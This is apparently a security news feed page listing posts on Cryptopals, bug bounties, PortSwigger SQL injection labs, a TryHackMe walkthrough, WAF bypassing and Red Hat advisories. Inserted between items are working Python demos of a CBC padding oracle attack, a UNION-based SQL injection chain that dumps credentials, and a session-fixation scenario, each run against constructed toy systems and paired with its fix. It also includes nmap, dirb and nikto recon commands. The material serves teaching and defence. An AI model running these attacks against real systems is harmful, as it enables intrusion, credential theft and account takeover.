Cybersecurity information flow

A clean information-feed tool focused on the day-to-day of the security community, surfacing quality content for security researchers every day.

Recent updates
Time  Source
2024-05-25 03:02 nccgroup
Hello and welcome back to the Cryptopals Guided Tour (previously, previously)! Today we are taking on Challenge 17, the famous padding oracle attack. For those who don’t know, Cryptopals is a series of eight sets of challenges covering common cryptographic constructs and common attacks on them. You can read more about Cryptopals at https://cryptopals.com/. There’s a […]

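The attack the nccgroup post walks through, as an added worked example (not code from the post or from Cryptopals): a CBC padding oracle that recovers a ciphertext's plaintext one byte at a time from nothing but the server's "padding valid / invalid" answer. The block cipher is a toy keyed Feistel network over SHA-256 standing in for AES, since the attack never looks inside the cipher; the key, IV and message are constructed for the demo. It also handles the classic edge case where a hit on the last byte is really a 0x02 0x02 padding rather than 0x01.

```python
import hashlib

BLOCK = 16
ROUNDS = 4


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key: bytes, rnd: int, half: bytes) -> bytes:
    # Feistel round function: keyed SHA-256 truncated to one 8-byte half.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 128-bit Feistel cipher standing in for AES; the attack never looks inside it."""
    left, right = block[:8], block[8:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _round_fn(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        left, right = _xor(right, _round_fn(key, rnd, left)), left
    return left + right


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        cur = ct[i:i + BLOCK]
        out += _xor(block_decrypt(key, cur), prev)
        prev = cur
    return out


class PaddingOracle:
    """Server side. All it ever reveals is whether the padding of a decryption checked out."""

    def __init__(self, key: bytes):
        self._key = key

    def padding_ok(self, iv: bytes, ct: bytes) -> bool:
        try:
            pkcs7_unpad(cbc_decrypt(self._key, iv, ct))
            return True
        except ValueError:
            return False


def recover_block(oracle: PaddingOracle, prev: bytes, target: bytes) -> bytes:
    """Recover one plaintext block from the oracle's yes/no answers alone.

    We learn I = Dec(target) from the last byte backwards. For pad value p the forged
    'previous block' is set so the already-known tail decrypts to p,...,p, then byte j is
    brute-forced until the oracle accepts: I[j] = guess ^ p, and P[j] = I[j] ^ prev[j].
    """
    inter = bytearray(BLOCK)
    for p in range(1, BLOCK + 1):
        j = BLOCK - p
        forged = bytearray(BLOCK)
        for k in range(j + 1, BLOCK):
            forged[k] = inter[k] ^ p
        for guess in range(256):
            forged[j] = guess
            if not oracle.padding_ok(bytes(forged), target):
                continue
            if p == 1:
                # Edge case: the accepted last byte may be part of a 0x02 0x02 (or longer)
                # padding rather than 0x01. Perturbing byte 14 breaks that; a true 0x01 survives.
                check = bytearray(forged)
                check[j - 1] ^= 0xFF
                if not oracle.padding_ok(bytes(check), target):
                    continue
            inter[j] = guess ^ p
            break
        else:
            raise RuntimeError("oracle never accepted a guess for byte %d" % j)
    return _xor(bytes(inter), prev)


def padding_oracle_decrypt(oracle: PaddingOracle, iv: bytes, ct: bytes) -> bytes:
    chain = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b"".join(recover_block(oracle, chain[i - 1], chain[i]) for i in range(1, len(chain)))
    return pkcs7_unpad(plain)


def demo(message: bytes = b"Cryptopals 17: the oracle leaks one bit per query") -> bytes:
    """Encrypt under a key the attacker never sees, then recover the message through the oracle."""
    key = b"server-side-key!"   # assumed secret, constructed for the demo
    iv = bytes(range(BLOCK))     # constructed; in Challenge 17 the IV comes with the ciphertext
    ct = cbc_encrypt(key, iv, pkcs7_pad(message))
    return padding_oracle_decrypt(PaddingOracle(key), iv, ct)


if __name__ == "__main__":
    print(demo())
```

Run it as a script to see the recovered message; the cost is at most 256 queries per byte plus the occasional re-check. The defence is the one Cryptopals leads to next: authenticate the ciphertext (an AEAD mode, or encrypt-then-MAC) so tampered ciphertexts are rejected before any padding is inspected and the oracle never exists.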
2024-05-25 01:13 GitHub watch
A white-box solution for a knowledge-base question-answering system built on large language models and multiple vector databases
2024-05-25 01:13 GitHub watch
a collection of resources around LLMs, aggregated for the workshop "Mastering LLMs: End-to-End Fine-Tuning and Deployment" by Dan Becker and Hamel …
2024-05-25 01:13 GitHub watch
💡 LeetCode in C++20/Java/Python/MySQL/TypeScript (respect coding conventions)
2024-05-25 00:26 Stories by SAFARAS K A on Medi
Discover the technical breakdown of CVE-2024-4761, an out-of-bounds write vulnerability in Chrome’s V8 JavaScript engine, its impact…
2024-05-25 00:26 Stories by SAFARAS K A on Medi
Long time no see! I’ve been a bit preoccupied with other tasks besides bug bounty hunting, so I haven’t had the chance to post any blogs. But setting all that aside, today I want to share how I achieved every beginner bug hunter’s dream: scoring that first bounty. Still gives me chills just thinking about it!
So, without further ado, let’s dive into the details of this exhilarating experience.
Let’s get Started
The most important takeaway from this blog is simple:
Keep learning about different vulnerabilities and, more importantly, put that newly gained knowledge into practice. There are hundreds and thousands of websites out there waiting to be hunted, with millions of vulnerabilities just waiting to be discovered by someone.
Further Details
Here’s how it all went down. The bug that landed me my first bounty was actually a combination of two bugs:
GraphQL API key leak & cache poisoning.
The target? A private one I stumbled upon using some good ol’ Google dorking. (Psst, here’s a handy repo for some similar G
2024-05-25 00:25 Stories by SAFARAS K A on Medi
How Search Engines Operate and Utilize Hidden Content
2024-05-25 00:25 Stories by SAFARAS K A on Medi
In the Name of Allah, the Most Beneficent, the Most Merciful.
All the praises and thanks be to Allah, the Lord of the ‘Alamin (mankind, jinns and all that exists).
Let’s just begin with what brings us here today (giggled amusingly).
PortSwigger SQLi labs cont’d (link to the first write-up)
Lab 3: SQL injection attack, listing the database contents on non-Oracle databases
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.
Solution
Most database types (except Oracle) have a set of views called the information schema. This provides inf
2024-05-25 00:25 Stories by SAFARAS K A on Medi
In an era where traditional passwords are increasingly vulnerable to cyber threats, biometric authentication emerges as a promising solution to enhance security and user convenience. Biometric authentication methods, such as facial recognition, fingerprint scanning, and iris recognition, leverage unique physical or behavioral characteristics to verify an individual’s identity. While biometrics offer numerous benefits, including improved security and usability, they also pose certain challenges, ranging from technical vulnerabilities to ethical concerns. This article delves into the advancements, vulnerabilities, and ethical considerations surrounding biometric authentication.
Advancements in Biometric Authentication
Biometric authentication has witnessed significant advancements in recent years, driven by advancements in technology and increasing adoption across various industries. Some notable advancements include:
Multimodal Biometrics: Combining multiple biometric modalities
2024-05-25 00:24 Stories by SAFARAS K A on Medi
OK, maybe ‘ultimate weapon’ is a bit strong. But hear me out…
What Do the Cool Kids Do?
If you browse the Internet for ‘cyber security projects’ you’re likely to come across things like the installation of technical tools, such as Wazuh, Pi-hole, or OpenVAS. These tools are fantastic and such projects can be a lot of fun, but what will they be protecting? As the old adage goes, “A band is only as good as its drummer” [1]. I’ve come to believe that a cyber security setup is only as good as its lists.
Five Cybersecurity Memes and What They Say About Cybersecurity Today (isaca.org)
Take a look at this,
“Please list the quantities and operating systems for your laptops, desktops and virtual desktops within the scope of this assessment”
This is text taken from section A2.4 in the ‘Montpellier’ release of the UK Cyber Essentials framework [2]. Other sections ask for lists of software, internet browsers, any open network ports, and which users have admin rights to which systems.
Another example comes from the NIST C
2024-05-25 00:23 Stories by SAFARAS K A on Medi
CVE-2023-52424, also known as the SSID Confusion Attack, has brought new challenges to wireless network security.
2024-05-25 00:23 Stories by SAFARAS K A on Medi
Fingerprinting Databases: SQLi (Oracle, MySQL, MS)
In the Name of Allah, the Most Beneficent, the Most Merciful.
All the praises and thanks be to Allah, the Lord of the ‘Alamin (mankind, jinns and all that exists).
I will start with Lab 3 of PortSwigger Academy. Please note that I don’t solve the labs at once; I keep trying and failing until I get it right. Sometimes I check the solution and then figure out a different way to solve it.
Lab 1 : SQL injection attack, querying the database type and version on Oracle
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
Objective
Solution
I selected the Pets category and tested its vulnerability by adding a single quote after “Pets,” resulting in an internal server error. I tried several times to confirm the number of columns available in the table by:
NOTE: Continue making changes until you receive an error, which will indicate the number of columns just before t
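The chain that Lab 3 above and the column-counting step in this fingerprinting write-up both describe, as one added worked example (not the labs’ own code or the author’s): a category filter that concatenates user input into SQL, a UNION-based attack that first finds the column count, then reads the catalog for the credentials table and its columns, then dumps it, and the parameterised query that shuts the whole thing down. It runs against an in-memory SQLite database, so the catalog queries use sqlite_master and pragma_table_info() where PostgreSQL and MySQL would use information_schema.tables and information_schema.columns (the equivalents are in the comments); the schema, table and column names are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the lab's shop: the product table behind the category filter plus the
# credentials table the lab asks you to find (its name and column names are deliberately odd).
SCHEMA = """
CREATE TABLE products (name TEXT, category TEXT, price REAL);
CREATE TABLE users_kx1q2 (username_hd7e TEXT, password_t4ra TEXT);
INSERT INTO products VALUES ('Leash', 'Pets', 9.5), ('Bowl', 'Pets', 4.0), ('Mug', 'Gifts', 6.0);
INSERT INTO users_kx1q2 VALUES ('administrator', 'Fmb2sZ9x'), ('wiener', 'peter');
"""


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def filter_products_vulnerable(conn, category: str):
    # The lab's bug: the category parameter is pasted straight into the SQL text.
    sql = "SELECT name, price FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()


def filter_products_safe(conn, category: str):
    # Fix: bind the value, so attacker text is never parsed as SQL.
    return conn.execute("SELECT name, price FROM products WHERE category = ?", (category,)).fetchall()


def union_inject(query, select_body: str):
    # Close the quote, append our SELECT, comment out the server's trailing quote.
    # '--' works on PostgreSQL and SQLite; MySQL needs '-- ' (trailing space) or '#'.
    return query("' UNION " + select_body + "--")


def select_padded(columns, from_clause: str, ncols: int) -> str:
    # A UNION needs the same column count on both sides; pad with NULL, which matches any type.
    return "SELECT " + ", ".join(list(columns) + ["NULL"] * (ncols - len(columns))) + " " + from_clause


def find_column_count(query, max_cols: int = 10) -> int:
    """Step 1 (the fingerprinting write-up): UNION SELECT NULL,NULL,... until no error comes back."""
    for n in range(1, max_cols + 1):
        try:
            union_inject(query, "SELECT " + ", ".join(["NULL"] * n))
            return n
        except sqlite3.OperationalError:  # column-count mismatch: the lab's internal server error
            continue
    raise RuntimeError("column count not found")


def list_tables(query, ncols: int):
    # Step 2: read the catalog. PostgreSQL/MySQL:  SELECT table_name FROM information_schema.tables
    # (Oracle has no information_schema; it uses all_tables). SQLite keeps the same facts in sqlite_master.
    rows = union_inject(query, select_padded(["name"], "FROM sqlite_master WHERE type = 'table'", ncols))
    return [r[0] for r in rows]


def list_columns(query, ncols: int, table: str):
    # Step 3: PostgreSQL/MySQL:  SELECT column_name FROM information_schema.columns WHERE table_name = '...'
    # SQLite exposes the same through the pragma_table_info() table-valued function (SQLite >= 3.16).
    rows = union_inject(query, select_padded(["name"], "FROM pragma_table_info('" + table + "')", ncols))
    return [r[0] for r in rows]


def dump_credentials(query, ncols: int, table: str, user_col: str, pass_col: str) -> dict:
    # Step 4: pull both columns out through the two reflected columns of the product listing.
    rows = union_inject(query, select_padded([user_col, pass_col], "FROM " + table, ncols))
    return {row[0]: row[1] for row in rows}


def run_attack(conn) -> str:
    """The full chain against the vulnerable filter; returns the administrator's password."""
    query = lambda payload: filter_products_vulnerable(conn, payload)
    ncols = find_column_count(query)
    table = next(t for t in list_tables(query, ncols) if t.startswith("users"))
    cols = list_columns(query, ncols, table)
    user_col = next(c for c in cols if c.startswith("username"))
    pass_col = next(c for c in cols if c.startswith("password"))
    return dump_credentials(query, ncols, table, user_col, pass_col)["administrator"]


if __name__ == "__main__":
    db = build_db()
    print("administrator password:", run_attack(db))
    print("same payload against the fixed filter:",
          filter_products_safe(db, "' UNION SELECT name, NULL FROM sqlite_master--"))
```

The injected catalog queries are the only database-specific part; the column-count probe, the NULL padding and the final dump are the same on every engine, which is why fingerprinting the database first (the point of the write-up above) tells you which catalog and which comment syntax to use.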
2024-05-25 00:22 Stories by SAFARAS K A on Medi
In the realm of ethical hacking and penetration testing, the quest to uncover vulnerabilities and secure systems is a thrilling adventure. In this journey, we’ll dive into my experience with the “Pickle Rick” TryHackMe challenge. I’ll take you through the steps I followed, revealing the valuable lessons learned along the way.
Step 1: Information Gathering
Every successful penetration test starts with information gathering. The goal is to collect as much data as possible about the target. I began by opening the website and inspecting its source code for hints. On lines 28–32, I stumbled upon a hidden clue inside a comment:
```
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
```
This crucial discovery hinted at a login page, implying that both a username and password would be required. To further explore potential vulnerabilities, I conducted content discovery using tools like dirb and nikto.
dirb http://Ip_address
nikto -h http://Ip_address
Step 2: Scanning and Enumeration
Understanding the target
2024-05-25 00:22 Stories by SAFARAS K A on Medi
We all hate web application firewalls! Most likely you have encountered them while testing for cross-site scripting. If you manage to get HTML injection, which is the initial step, you know that there must be a bug out there. Let me help you bypass this annoying thing and get that bounty on the table! It’s time to dive head-first into more techniques for bypassing web protections. We will explore how those protections are implemented and how we can find ways to overcome them.
Initial Setup
This is the setup I will be using:
On the left we have the client; a CloudFlare firewall in the middle acts as a proxy in front of the CTF server on the right. The CTF server is labs.hackxpert.com, which is made by XSSRat. He has some nice content related to XSS as well. Instead of going directly to labs.hackxpert.com, the requests will be sent through my CloudFlare, just to demonstrate from the defensive side how it looks, how engineers are making blocking
2024-05-25 00:21 Stories by SAFARAS K A on Medi
TCM Academy Walkthrough: Linux Privilege Escalation
#Bankai
Academy is a deliberately vulnerable virtual machine (VM) used for testing and practising penetration-testing techniques. It was built by TCM Security as the capstone of the Practical Ethical Hacking course.
Academy.7z
I got the IP address using sudo arp-scan -l. Then I checked whether it was running a web service. As expected, it was.
I checked Wappalyzer for information about the web stack.
I came prepared with my arsenal. I called on nmap and fired it at the IP:
nmap -A -T4 -p- 192.168.57.252
Nmap result
I logged in as ftp on port 21, since it allows anonymous login (ftp/ftp):
I downloaded note.txt to my machine and found some useful information in it.
So there is a login portal. I tried content discovery with Dirb, but the output was too noisy, with many different response codes (403, 401, 200, and so on), so I switched to ffuf and filtered for the responses I wanted, 200 and 301.
I navigated to /academy
2024-05-25 00:21 Stories by SAFARAS K A on Medi
There are numerous ways to handle authorization on a website. From session-based authentication to token-based authorization, whichever method you use has to be properly configured, or the whole application may become prone to account takeover.
In my case, though, although the target was horribly configured, the flaw was not exploitable by itself. It had to be chained with other issues to reach impact.
Let’s call the main target I performed the account takeover on weakauth.main.com.
Quite simply, the target was written in ASP.NET.
On first visiting the website, you are issued a cookie called ASP.NET_SessionId that is entirely unauthenticated and unprivileged.
Set-Cookie: ASP.NET_SessionId=doonz8hcdquy72tkvfflqy34d;
At this point the cookie has zero privileges.
This is where the vulnerability comes into play: when I authenticate to the website, I am not issued a new session cookie. My previous cookie stays; it is just upgraded.
This allows me to perform the a
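The cookie behaviour the post describes, as an added example (not the author’s code or the target’s): a session store whose login keeps the pre-authentication ASP.NET_SessionId and just marks it authenticated, beside the fixed version that issues a new id at login, with the session-fixation scenario played against both. The user store, password and cookie attributes are constructed for the demo; how the attacker gets the planted id into the victim’s browser is the part the post says had to be chained with other issues, and is left out here.

```python
import secrets

# Constructed user store for the demo; the real site's data is not on the page.
USERS = {"victim": "correct-horse-battery"}
COOKIE = "ASP.NET_SessionId"


def check_password(username: str, password: str) -> bool:
    return USERS.get(username) == password


class SessionStore:
    """Minimal server-side session table: id -> {"user": None | username}."""

    def __init__(self, rotate_on_login: bool):
        self.rotate_on_login = rotate_on_login
        self._sessions = {}

    def new_session(self) -> str:
        """Issued to every first-time visitor, before any authentication (the post's zero-privilege cookie)."""
        sid = secrets.token_urlsafe(18)
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, sid: str, username: str, password: str):
        """Returns the session id the browser should hold after login, or None on failure."""
        if sid not in self._sessions or not check_password(username, password):
            return None
        if not self.rotate_on_login:
            # Vulnerable behaviour from the post: the pre-auth id is kept and merely "upgraded".
            self._sessions[sid]["user"] = username
            return sid
        # Hardened: retire the pre-auth id and bind a fresh, never-seen id to the authenticated user.
        del self._sessions[sid]
        fresh = secrets.token_urlsafe(18)
        self._sessions[fresh] = {"user": username}
        return fresh

    def whoami(self, sid: str):
        return self._sessions.get(sid, {}).get("user")


def set_cookie_header(sid: str) -> str:
    """What the login response should carry once the id has been rotated (attributes assumed)."""
    return "Set-Cookie: %s=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % (COOKIE, sid)


def session_fixation(store: SessionStore) -> dict:
    """Replay the fixation scenario; returns who the server thinks each party is after login."""
    # 1. Attacker fetches the site and is handed an anonymous session id.
    planted = store.new_session()
    # 2. Attacker gets that id into the victim's browser (delivery vector out of scope here).
    # 3. Victim logs in while carrying the planted cookie.
    victim_sid = store.login(planted, "victim", "correct-horse-battery")
    # 4. Attacker presents the planted id, which only the vulnerable store still honours.
    return {"attacker_sees": store.whoami(planted), "victim_sees": store.whoami(victim_sid)}


if __name__ == "__main__":
    print("no rotation:", session_fixation(SessionStore(rotate_on_login=False)))
    print("rotation:   ", session_fixation(SessionStore(rotate_on_login=True)))
```

The check to run against any site you test is the same as the demo’s: note the session cookie before login, log in, and confirm the value changed. If it did not, every id the attacker can plant before authentication becomes an authenticated session afterwards.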
2024-05-25 00:13 hackone
Affected vendor: HackerOne (https://hackerone.com/security)  Bounty:  Severity: medium
" Insufficient redaction exposes sensitive information via the "ShareReportViaEmail" GraphQL endpoint."
2024-05-25 00:13 hackone
Affected vendor: Internet Bug Bounty (https://hackerone.com/ibb)  Bounty:  Severity: low
" [CVE-2024-26146] Header parsing could lead to a possible denial-of-service vulnerability."
2024-05-25 00:13 SecWiki Weekly
Tracing Bitcoin: a detailed analysis workflow with real cases https://mp.weixin.qq.com/s/bxJ3tSEOGnyTy-Ck7mRn0Q
[SecData] Public dark-web traffic dataset 1 https://mp.weixin.qq.com/s/5BKa9KDU-Kggc_WMQ1XBGw
2024-05-24 23:44 Packet Storm
Red Hat Security Advisory 2024-3321-03 - An update for pcp is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.
2024-05-24 23:44 Packet Storm
Red Hat Security Advisory 2024-3322-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.
2024-05-24 23:44 Packet Storm
Red Hat Security Advisory 2024-3323-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.
2024-05-24 23:44 Packet Storm
Red Hat Security Advisory 2024-3324-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.
2024-05-24 23:44 Packet Storm
Red Hat Security Advisory 2024-3325-03 - An update for pcp is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.
2024-05-24 23:44 Packet Storm
Red Hat Security Advisory 2024-3338-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include bypass and use-after-free vulnerabilities.